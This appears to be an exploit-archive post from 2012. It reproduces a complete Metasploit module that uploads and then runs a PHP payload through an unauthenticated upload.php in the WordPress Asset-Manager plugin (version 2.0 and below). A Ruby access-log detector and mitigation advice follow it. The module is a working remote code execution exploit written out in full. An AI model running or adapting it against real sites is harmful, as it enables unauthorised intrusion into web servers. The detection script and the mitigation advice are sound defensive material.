WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager WordPress plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file into a temporary directory without any authentication, which results in arbitrary code execution.
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # The PHP payload is sent as the multipart form field "Filedata",
    # which is the field the plugin's upload.php handler reads.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in the plugin's temp directory under wp-content/uploads,
    # so a plain GET to it makes the web server execute the PHP.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```
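Seen from the defender's side, the module above leaves a two-step footprint in the web server access log: a POST to the plugin's upload.php followed shortly by a GET for a freshly named .php file under wp-content/uploads/assets/temp/ from the same client. The script below is an added example, not part of the original post or of the Metasploit module; it parses Apache/nginx "combined" format access log lines, pairs each request for a .php file in the temp directory with a preceding upload from the same client inside a time window, and returns findings. The paths are the ones the module uses; the log lines, client addresses and file name are constructed.

```ruby
# Added example (not from the original post or the Metasploit module):
# detect the Asset-Manager upload-then-execute pattern in access logs.
require 'time'

# Paths as used by the module above (TARGETURI prefix may vary, so match by suffix/substring).
UPLOAD_PATH = '/wp-content/plugins/asset-manager/upload.php'
TEMP_DIR    = '/wp-content/uploads/assets/temp/'

# Combined log format: client, identd, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+/

# Returns a hash for one log line, or nil when the line does not parse.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip:     m[:ip],
    time:   Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path:   m[:path].split('?', 2).first, # drop any query string
    status: m[:status].to_i,
  }
end

# Walks the lines in order and returns an array of findings.
#   :upload_then_exec  - GET of a .php in the temp dir preceded (within +window+ seconds)
#                        by a POST to upload.php from the same client: high confidence.
#   :temp_php_request  - GET of a .php in the temp dir with no matching upload seen:
#                        still worth a look, since nothing legitimate should be served from there.
def detect_asset_manager_abuse(lines, window: 300)
  uploads  = Hash.new { |h, k| h[k] = [] } # client ip -> list of upload events
  findings = []

  lines.each do |line|
    ev = parse_line(line)
    next unless ev

    if ev[:method] == 'POST' && ev[:path].end_with?(UPLOAD_PATH)
      uploads[ev[:ip]] << ev
      next
    end

    next unless ev[:method] == 'GET' && ev[:path].include?(TEMP_DIR) && ev[:path].end_with?('.php')

    prior = uploads[ev[:ip]].find { |u| (ev[:time] - u[:time]).between?(0, window) }
    findings << {
      kind:        prior ? :upload_then_exec : :temp_php_request,
      ip:          ev[:ip],
      uploaded_at: prior && prior[:time],
      requested:   ev[:path],
      status:      ev[:status],
    }
  end
  findings
end

# Constructed sample log: a benign visit, one upload-then-execute sequence from
# 198.51.100.23, and a later lone request for the same temp file from another client.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.23 - - [31/Dec/2012:09:22:10 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
  198.51.100.23 - - [31/Dec/2012:09:22:11 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:25:40 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxm.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
LOG

if $PROGRAM_NAME == __FILE__
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:kind]} from #{f[:ip]}: #{f[:requested]} (HTTP #{f[:status]})"
  end
end
```

Feed it real logs with `detect_asset_manager_abuse(File.foreach('access.log'))`. The pairing by client address and time window is what separates a real compromise from noise such as a scanner that only probes the temp directory; the mitigation for the underlying bug is the same either way: require authentication on upload.php and deny PHP execution under wp-content/uploads.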